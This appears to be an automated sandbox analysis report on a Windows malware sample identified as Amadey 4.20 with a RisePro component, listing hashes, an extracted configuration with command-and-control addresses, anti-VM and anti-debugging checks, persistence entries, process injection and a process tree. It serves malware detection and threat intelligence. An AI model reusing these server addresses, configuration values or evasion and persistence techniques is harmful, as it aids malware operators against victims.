Analysis
max time kernel: 150s
max time network: 152s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64 arch:x86 image:win11-20240426-en locale:en-us os:windows11-21h2-x64 system
submitted: 15-05-2024 12:58
Behavioral task: behavioral1
Sample: a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
Resource: win10v2004-20240508-en
General
Target: a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
Size: 1.5MB
MD5: 32187c18a470b54095365f8db359a671
SHA1: 3ce7f687006e176a5b1554e30decdfed60e35aae
SHA256: a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948
SHA512: a9873b6ac3f480ad881bee4fe52d960127696f816007ee1ed4a2511ff82f7cc10ec98ef16cdc2869b49b716d3453ee6a7d952a1988083d046ba05dd9d579449a
SSDEEP: 24576:92vbP2LX8eT+onZIeV1B/0ZGP5Ulz9xw0i0sx9rNqdy5/rwjXUx68BFrgPUv:9kyweTrZIQ8o2z9ST089BqurwLI7vMcv
Malware Config
Extracted
Family: amadey
Version: 4.20
C2: http://5.42.96.141
C2: http://5.42.96.7
install_dir: 908f070dff
install_file: explorku.exe
strings_key: b25a9385246248a95c600f9a061438e1
url_paths: /go34ko8/index.php
Extracted
Family: risepro
C2: 147.45.47.126:58709
Signatures

Detect ZGRat V1 20 IoCs
resource | yara_rule
behavioral2/memory/2820-111-0x0000000006820000-0x0000000006A60000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-115-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-114-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-123-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-121-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-132-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-149-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-147-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-145-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-143-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-141-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-139-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-137-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-136-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-133-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-125-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-119-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-117-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-129-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1
behavioral2/memory/2820-127-0x0000000006820000-0x0000000006A5A000-memory.dmp | family_zgrat_v1

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 3364 created 636 | 3364 | powershell.EXE | 5

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplons.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplons.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 18571080f2.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplons.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorku.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorku.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explorku.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | amers.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 18571080f2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 18571080f2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorku.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | amers.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorku.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorku.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorku.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explorku.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explorku.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | amers.exe

Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs | Kaxhwswfup.exe

Executes dropped EXE 12 IoCs
pid | Process
2272 | explorku.exe
4436 | amers.exe
1936 | axplons.exe
2824 | 18571080f2.exe
2820 | Kaxhwswfup.exe
4304 | axplons.exe
1044 | explorku.exe
3368 | $7760c8f0
1968 | explorku.exe
4412 | $772f9fd5
484 | axplons.exe
1288 | explorku.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine | amers.exe
Key opened | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine | axplons.exe
Key opened | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine | axplons.exe
Key opened | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine | axplons.exe

resource | yara_rule
behavioral2/memory/4972-0-0x00000000009D0000-0x0000000000EBC000-memory.dmp | themida
behavioral2/memory/4972-2-0x00000000009D0000-0x0000000000EBC000-memory.dmp | themida
behavioral2/memory/4972-3-0x00000000009D0000-0x0000000000EBC000-memory.dmp | themida
behavioral2/memory/4972-1-0x00000000009D0000-0x0000000000EBC000-memory.dmp | themida
behavioral2/memory/4972-5-0x00000000009D0000-0x0000000000EBC000-memory.dmp | themida
behavioral2/memory/4972-6-0x00000000009D0000-0x0000000000EBC000-memory.dmp | themida
behavioral2/memory/4972-7-0x00000000009D0000-0x0000000000EBC000-memory.dmp | themida
behavioral2/memory/4972-4-0x00000000009D0000-0x0000000000EBC000-memory.dmp | themida
behavioral2/memory/4972-8-0x00000000009D0000-0x0000000000EBC000-memory.dmp | themida
behavioral2/files/0x000100000002aa29-14.dat | themida
behavioral2/memory/4972-21-0x00000000009D0000-0x0000000000EBC000-memory.dmp | themida
behavioral2/memory/2272-22-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/2272-30-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/2272-27-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/2272-26-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/2272-29-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/2272-28-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/2272-24-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/2272-25-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/2272-23-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/2272-64-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/files/0x000100000002aa2e-69.dat | themida
behavioral2/memory/2824-83-0x0000000000CB0000-0x0000000001326000-memory.dmp | themida
behavioral2/memory/2824-85-0x0000000000CB0000-0x0000000001326000-memory.dmp | themida
behavioral2/memory/2824-86-0x0000000000CB0000-0x0000000001326000-memory.dmp | themida
behavioral2/memory/2824-87-0x0000000000CB0000-0x0000000001326000-memory.dmp | themida
behavioral2/memory/2824-84-0x0000000000CB0000-0x0000000001326000-memory.dmp | themida
behavioral2/memory/2824-90-0x0000000000CB0000-0x0000000001326000-memory.dmp | themida
behavioral2/memory/2824-91-0x0000000000CB0000-0x0000000001326000-memory.dmp | themida
behavioral2/memory/2824-89-0x0000000000CB0000-0x0000000001326000-memory.dmp | themida
behavioral2/memory/2824-88-0x0000000000CB0000-0x0000000001326000-memory.dmp | themida
behavioral2/memory/2272-4273-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/1044-5011-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/1044-5019-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/2824-5024-0x0000000000CB0000-0x0000000001326000-memory.dmp | themida
behavioral2/memory/1968-5679-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/1968-5743-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida
behavioral2/memory/1288-5788-0x0000000000810000-0x0000000000CFC000-memory.dmp | themida

Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\18571080f2.exe = "C:\\Users\\Admin\\1000006002\\18571080f2.exe" | explorku.exe

Checks whether UAC is enabled 5 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | explorku.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 18571080f2.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | explorku.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | explorku.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe

Drops file in System32 directory 5 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid | Process
4436 | amers.exe
1936 | axplons.exe
4304 | axplons.exe
484 | axplons.exe

Suspicious use of SetThreadContext 3 IoCs
description | pid | Process | procid_target
PID 2820 set thread context of 3368 | 2820 | Kaxhwswfup.exe | 90
PID 3364 set thread context of 2252 | 3364 | powershell.EXE | 93
PID 2820 set thread context of 4412 | 2820 | Kaxhwswfup.exe | 94

Drops file in Windows directory 2 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\explorku.job | a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
File created | C:\Windows\Tasks\axplons.job | amers.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Modifies data under HKEY_USERS 55 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715777985" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 15 May 2024 12:59:46 GMT" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={DA4A53E1-FE86-4F0F-B330-24C883B334B2}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
4436 | amers.exe
4436 | amers.exe
1936 | axplons.exe
1936 | axplons.exe
4304 | axplons.exe
4304 | axplons.exe
3364 | powershell.EXE
3364 | powershell.EXE
3364 | powershell.EXE
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2820 | Kaxhwswfup.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe
2252 | dllhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2820 | Kaxhwswfup.exe
Token: SeDebugPrivilege | 3364 | powershell.EXE
Token: SeDebugPrivilege | 3364 | powershell.EXE
Token: SeDebugPrivilege | 2252 | dllhost.exe
Token: SeDebugPrivilege | 2820 | Kaxhwswfup.exe

Suspicious use of UnmapMainImage 1 IoCs
pid | Process
4000 | RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 4972 wrote to memory of 2272 | 4972 | a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe | 82
PID 4972 wrote to memory of 2272 | 4972 | a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe | 82
PID 4972 wrote to memory of 2272 | 4972 | a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe | 82
PID 2272 wrote to memory of 1968 | 2272 | explorku.exe | 83
PID 2272 wrote to memory of 1968 | 2272 | explorku.exe | 83
PID 2272 wrote to memory of 1968 | 2272 | explorku.exe | 83
PID 2272 wrote to memory of 4436 | 2272 | explorku.exe | 84
PID 2272 wrote to memory of 4436 | 2272 | explorku.exe | 84
PID 2272 wrote to memory of 4436 | 2272 | explorku.exe | 84
PID 4436 wrote to memory of 1936 | 4436 | amers.exe | 85
PID 4436 wrote to memory of 1936 | 4436 | amers.exe | 85
PID 4436 wrote to memory of 1936 | 4436 | amers.exe | 85
PID 2272 wrote to memory of 2824 | 2272 | explorku.exe | 86
PID 2272 wrote to memory of 2824 | 2272 | explorku.exe | 86
PID 2272 wrote to memory of 2824 | 2272 | explorku.exe | 86
PID 1936 wrote to memory of 2820 | 1936 | axplons.exe | 87
PID 1936 wrote to memory of 2820 | 1936 | axplons.exe | 87
PID 1936 wrote to memory of 2820 | 1936 | axplons.exe | 87
PID 2820 wrote to memory of 3368 | 2820 | Kaxhwswfup.exe | 90
PID 2820 wrote to memory of 3368 | 2820 | Kaxhwswfup.exe | 90
PID 2820 wrote to memory of 3368 | 2820 | Kaxhwswfup.exe | 90
PID 2820 wrote to memory of 3368 | 2820 | Kaxhwswfup.exe | 90
PID 2820 wrote to memory of 3368 | 2820 | Kaxhwswfup.exe | 90
PID 2820 wrote to memory of 3368 | 2820 | Kaxhwswfup.exe | 90
PID 2820 wrote to memory of 3368 | 2820 | Kaxhwswfup.exe | 90
PID 2820 wrote to memory of 3368 | 2820 | Kaxhwswfup.exe | 90
PID 2820 wrote to memory of 3368 | 2820 | Kaxhwswfup.exe | 90
PID 3364 wrote to memory of 2252 | 3364 | powershell.EXE | 93
PID 3364 wrote to memory of 2252 | 3364 | powershell.EXE | 93
PID 3364 wrote to memory of 2252 | 3364 | powershell.EXE | 93
PID 3364 wrote to memory of 2252 | 3364 | powershell.EXE | 93
PID 3364 wrote to memory of 2252 | 3364 | powershell.EXE | 93
PID 3364 wrote to memory of 2252 | 3364 | powershell.EXE | 93
PID 3364 wrote to memory of 2252 | 3364 | powershell.EXE | 93
PID 3364 wrote to memory of 2252 | 3364 | powershell.EXE | 93
PID 2252 wrote to memory of 636 | 2252 | dllhost.exe | 5
PID 2252 wrote to memory of 692 | 2252 | dllhost.exe | 7
PID 2252 wrote to memory of 992 | 2252 | dllhost.exe | 12
PID 2252 wrote to memory of 560 | 2252 | dllhost.exe | 13
PID 2252 wrote to memory of 436 | 2252 | dllhost.exe | 14
PID 2252 wrote to memory of 756 | 2252 | dllhost.exe | 15
PID 2252 wrote to memory of 1072 | 2252 | dllhost.exe | 16
PID 2252 wrote to memory of 1080 | 2252 | dllhost.exe | 17
PID 2252 wrote to memory of 1200 | 2252 | dllhost.exe | 19
PID 2252 wrote to memory of 1220 | 2252 | dllhost.exe | 20
PID 2252 wrote to memory of 1272 | 2252 | dllhost.exe | 21
PID 2252 wrote to memory of 1320 | 2252 | dllhost.exe | 22
PID 2252 wrote to memory of 1448 | 2252 | dllhost.exe | 23
PID 2252 wrote to memory of 1456 | 2252 | dllhost.exe | 24
PID 2252 wrote to memory of 1516 | 2252 | dllhost.exe | 25
PID 2252 wrote to memory of 1572 | 2252 | dllhost.exe | 26
PID 2252 wrote to memory of 1592 | 2252 | dllhost.exe | 27
PID 2252 wrote to memory of 1716 | 2252 | dllhost.exe | 28
PID 2252 wrote to memory of 1732 | 2252 | dllhost.exe | 29
PID 2252 wrote to memory of 1776 | 2252 | dllhost.exe | 30
PID 2252 wrote to memory of 1828 | 2252 | dllhost.exe | 31
PID 2252 wrote to memory of 1892 | 2252 | dllhost.exe | 32
PID 2252 wrote to memory of 1528 | 2252 | dllhost.exe | 33
PID 2252 wrote to memory of 1676 | 2252 | dllhost.exe | 34
PID 2252 wrote to memory of 1984 | 2252 | dllhost.exe | 35
PID 2252 wrote to memory of 2072 | 2252 | dllhost.exe | 36
PID 2252 wrote to memory of 2140 | 2252 | dllhost.exe | 37
PID 2252 wrote to memory of 2244 | 2252 | dllhost.exe | 39
PID 2252 wrote to memory of 2352 | 2252 | dllhost.exe | 40

Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:636
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:560
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b8377828-929b-43ee-9f69-7bf2a579ed36}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1200
-
